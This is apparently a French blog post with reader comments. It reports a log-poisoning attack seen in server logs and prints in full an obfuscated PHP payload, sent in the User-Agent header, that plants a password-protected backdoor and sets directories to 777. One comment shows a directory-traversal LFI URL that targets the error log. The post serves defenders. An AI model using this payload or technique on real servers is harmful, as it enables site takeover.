Attaque via le User-Agent vu dans les logs

Je viens de remarquer ça dans les logs et ça vous intéressera peut-être 🙂

Visiblement une ou plusieurs personnes s’amusent à scanner des sites web en passant du code PHP malicieux dans l’entête HTTP User-Agent. Impossible pour le moment de savoir si les attaquants ont connaissance d’une faille dans une appli web donnée où s’ils espèrent que ça mordera à l’hameçon (sur un malentendu ça peut marcher ?)

Le code est le suivant :
<?php eval(base64_decode(\"QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KDQphZGRMb2FkZXIoKTsNCiRkYXRhID0g
QG9wZW5kaXIoJy4nKTsNCg0Kd2hpbGUgKCRmaWxlID0gQHJlYWRkaXIoJGRhdGEpKQ0Kew0KCSRmaWx
lID0gdHJpbSgkZmlsZSk7DQoJaWYgKCEkZmlsZSB8fCBwcmVnX21hdGNoKCcvXlwuKyQvJywgJGZpbG
UpIHx8ICFpc19kaXIoJGZpbGUpKSBjb250aW51ZTsNCglhZGRMb2FkZXIoJGZpbGUpOw0KfQ0KDQpAY
2xvc2VkaXIoJGRhdGEpOw0KDQpmdW5jdGlvbiBhZGRMb2FkZXIoJGRpciA9ICcnKQ0Kew0KICAgIGlm
ICgkZGlyKSAkZGlyIC49ICcvJzsNCiAgICBAY2htb2QoJGRpciwgNzc3KTsNCiAgICANCiAgICAkZnA
gPSBmb3BlbigieyRkaXJ9ODlmNjEyMWZlYmEwMmUyY2NkZGI0YmExOWExMTU3ZTIucGhwIiwgInciKT
sgDQogICAgZndyaXRlKCRmcCwgYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DZzBLUUdsdWFWOXpaWFFvS
jJGc2JHOTNYM1Z5YkY5bWIzQmxiaWNzSURFcE93MEtRR2x1YVY5elpYUW9KMlJsWm1GMWJIUmZjMjlq
YTJWMFgzUnBiV1Z2ZFhRbkxDQTJNQ2s3RFFwQWFXNXBYM05sZENnbmJXRjRYMlY0WldOMWRHbHZibDk
wYVcxbEp5d2dOakFwT3cwS1FITmxkRjkwYVcxbFgyeHBiV2wwS0RZd0tUc05DZzBLSkdSaGRHRWdQU0
JBZFc1elpYSnBZV3hwZW1Vb1ltRnpaVFkwWDJSbFkyOWtaU2gwY21sdEtFQWtYMUJQVTFSYkoyUmhkR
0VuWFNrcEtUc05DZzBLYVdZZ0tFQWhhWE5mWVhKeVlYa29KR1JoZEdFcElIeDhJRzFrTlNna1pHRjBZ
VnNuY0dGemMzZHZjbVFuWFNrZ0lUMGdKMlF6WkdZME16bGpNMlUwWWpKak5ERTVNakJrT0dVeU56TXp
NVEV6TWpNMkp5a2daWGhwZERzTkNtbG1JQ2hBSkdSaGRHRmJKMk52WkdVblhTa2daWFpoYkNoaVlYTm
xOalJmWkdWamIyUmxLQ1JrWVhSaFd5ZGpiMlJsSjEwcEtUc05DbWxtSUNoQUpHUmhkR0ZiSjJOb1pXT
nJYMk52WkdVblhTa2djSEpwYm5RZ0pHUmhkR0ZiSjJOb1pXTnJYMk52WkdVblhUc05DZzBLUHo0PScp
KTsNCglmY2xvc2UoJGZwKTsNCg0KCWlmIChmaWxlX2V4aXN0cygieyRkaXJ9ODlmNjEyMWZlYmEwMmU
yY2NkZGI0YmExOWExMTU3ZTIucGhwIikpDQoJew0KICAgICAgICAkY2sgPSAiMTgyMzY0OTM2NTgyMD
M1NCI7DQoJICAgIHByaW50ICIkY2s6eyp9OiRkaXI6eyp9OiI7DQoJCWV4aXQ7DQoJfQ0KfQ==\")); ?>

Le code dé-obfusqué peut être trouvé ici. Quelques personnes l’ont déjà remarqué sur la période des 10 derniers jours.

3 réflexions au sujet de « Attaque via le User-Agent vu dans les logs »

  1. Mettre du code PHP dans le UA permet via une faille LFI de l’exécuter.
    Exemple si ‘http://site.ext/file.php?inc=../../../../../var/log/httpd/error.log’ affiche le fichier des logs, alors le code sera exécuter.
    Pourquoi dans l’UA? Car sinon certaines balises seraient transformées et le code ne pourrait pas s’exécuter correctement.
    Recherches dans tes logs quels scripts étaient visés, tu découvriras peut être un 0day 🙂

  2. @Krach : +1

    En effet, il s’agit d’un tentative d’LFI qui permet de contourner les sécurité mises en place côté serveur (PHP).

    Un mec a publié un petit de-brief de la tentative d’attaque : http://www.userdel.org/?p=66

    Comme expliqué dans le billet, le but est donc de rendre le repertoire courant ouvert en accès d’écriture (777) et écris un fichier NAME.PHP qui est en fait une backdoor…

    Encore du bidouillage qui peut marcher ^^

Les commentaires sont fermés.